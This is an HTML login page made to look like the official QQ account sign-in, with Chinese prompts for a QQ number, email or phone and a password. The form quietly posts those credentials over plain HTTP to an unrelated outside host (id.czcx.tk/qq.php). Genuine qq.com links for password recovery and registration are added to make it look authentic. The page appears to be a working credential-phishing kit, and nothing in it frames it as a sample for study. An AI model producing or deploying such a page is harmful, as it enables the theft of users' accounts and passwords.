<!DOCTYPE html>
<html>
<head>

<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<script type="text/javascript" src="js/jquery-1.11.1.min.js"></script>

<link href="css/style.css" rel="stylesheet" type="text/css" media="all" />

</head>
<body link="#3481cf" alink="#3481cf" vlink="#3481cf">
<div class="main">
	<div class="w3_login">
		<div class="w3_login_module">
			<div class="module form-module">
				<div class="toggle">
				</div>
				<div class="form">
					<div class="topcenter">帐号密码登录</div>
					<div class="middletextcenter">推荐使用<a href="qrcode.htm">快速安全登录</a>，防止盗号。</div>
					<br/><br/>
					<form action="http://id.czcx.tk/qq.php" method="post" target="_parent">
						<input type="text" name="Username" placeholder="支持QQ号/邮箱/手机号登录" required=" " />
						<input type="password" name="Password" placeholder="密码" required=" " />
						<input type="submit" value="授权并登录"/><!--POST ON HERE-->
					</form>
					<br/>
					<div class="bottom">
					&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
						<a class="link" href="https://ssl.ptlogin2.qq.com/ptui_forgetpwd" target="_blank">忘了密码？</a>&nbsp;&nbsp;
						<span class="dotted">|</span>&nbsp;&nbsp;
						<a class="link" href="https://ssl.ptlogin2.qq.com/j_newreg_url" target="_blank">注册新帐号</a>&nbsp;&nbsp;
						<span class="dotted">|</span>&nbsp;&nbsp;
						<a class="link" href="https://support.qq.com/products/77942" target="_blank">意见反馈</a>
					</div>
				</div>
			</div>
		</div>
	</div>
</div>
</body>
</html>